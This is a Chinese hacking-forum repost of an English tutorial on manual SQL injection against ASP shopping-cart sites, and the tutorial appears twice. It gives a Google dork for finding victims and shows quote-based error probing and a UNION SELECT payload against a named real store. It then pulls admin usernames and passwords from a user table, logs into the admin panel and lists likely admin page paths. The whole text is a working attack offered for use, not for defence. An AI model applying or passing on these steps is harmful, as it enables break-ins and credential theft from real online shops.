首页
搜索
Latest images
注册
登录国外的一篇手工注入的文章
黑色星空 :: 黑色星空 :: 网络攻防(行千里路,读万卷书) :: 攻防转载
第1页/共1页
国外的一篇手工注入的文章
Admin 周一 一月 09, 2012 10:15 am
引用内容
BEGIN
First go to google.com and put this
inurl:/shopdisplayproducts.asp
Ok, now we find some site with shopdisplayproducts.asp
Let see some site
http://www.globalasp.org.uk/store/s...ducts.asp?id=14
ok ... now we put on end of link this sign '
now link look like this
http://www.globalasp.org.uk/store/shopdisp....asp?id=14'
And we get ERROR
Products
Mcft JET Database Engine error '80040e14'
Syntax error in string in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname'.
/store/shop$db.asp, line 467
If we see this error then is HACKABLE ) !!!
Ok ... now we removed '
http://www.globalasp.org.uk/store/s...ducts.asp?id=14
and on this add this
%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser'
Link now is
http://www.globalasp.org.uk/store/shopdisp...%20tbluser'
And put it in the browser we get the same error !!!
Ok ... now you see this numbers ...
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50
Now we removed ,50
and we now test
http://www.globalasp.org.uk/store/shopdisp...%20tbluser'
The same error and now we removed and removed number, and when we don't see this error we must see some site, on this server correct number for
exploit is -> 47 <-
http://www.globalasp.org.uk/store/shopdisp...%20tbluser' ---> THIS YOU SEE 47 is the END NUMBER
Ok now we put this in browser and don't see ERROR we see some LAPTOPs
Ok ... now we find on that site numbers 3 and 4
They are small
When we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword
NOw explotable link is this
http://www.globalasp.org.uk/store/shopdisp...%20tbluser'
and look where was 3 and 4 number now there are username and password for
login in SHOPADMIN , now we are going to this link
http://www.globalasp.org.uk/store/colours$config.asp
there is LOGIN for shopadmin and we login !!!
THIS ARE PATH Where CAN BE SHOPADMINs TOO
shopadmin.asp ----> THIS or ... WITH 1
shopadmin1.asp ----> THIS IS IN 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
[/td][/tr]
[/table]
BEGIN
First go to google.com and put this
inurl:/shopdisplayproducts.asp
Ok, now we find some site with shopdisplayproducts.asp
Let see some site
http://www.globalasp.org.uk/store/s...ducts.asp?id=14
ok ... now we put on end of link this sign '
now link look like this
http://www.globalasp.org.uk/store/shopdisp....asp?id=14'
And we get ERROR
Products
Mcft JET Database Engine error '80040e14'
Syntax error in string in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname'.
/store/shop$db.asp, line 467
If we see this error then is HACKABLE ) !!!
Ok ... now we removed '
http://www.globalasp.org.uk/store/s...ducts.asp?id=14
and on this add this
%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser'
Link now is
http://www.globalasp.org.uk/store/shopdisp...%20tbluser'
And put it in the browser we get the same error !!!
Ok ... now you see this numbers ...
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50
Now we removed ,50
and we now test
http://www.globalasp.org.uk/store/shopdisp...%20tbluser'
The same error and now we removed and removed number, and when we don't see this error we must see some site, on this server correct number for
exploit is -> 47 <-
http://www.globalasp.org.uk/store/shopdisp...%20tbluser' ---> THIS YOU SEE 47 is the END NUMBER
Ok now we put this in browser and don't see ERROR we see some LAPTOPs
Ok ... now we find on that site numbers 3 and 4
They are small
When we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword
NOw explotable link is this
http://www.globalasp.org.uk/store/shopdisp...%20tbluser'
and look where was 3 and 4 number now there are username and password for
login in SHOPADMIN , now we are going to this link
http://www.globalasp.org.uk/store/colours$config.asp
there is LOGIN for shopadmin and we login !!!
THIS ARE PATH Where CAN BE SHOPADMINs TOO
shopadmin.asp ----> THIS or ... WITH 1
shopadmin1.asp ----> THIS IS IN 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
[/td][/tr]
[/table]
Admin- Admin
- 帖子数 : 13
注册日期 : 12-01-09 -
黑色星空 :: 黑色星空 :: 网络攻防(行千里路,读万卷书) :: 攻防转载
第1页/共1页
您在这个论坛的权限:
您不能在这个论坛回复主题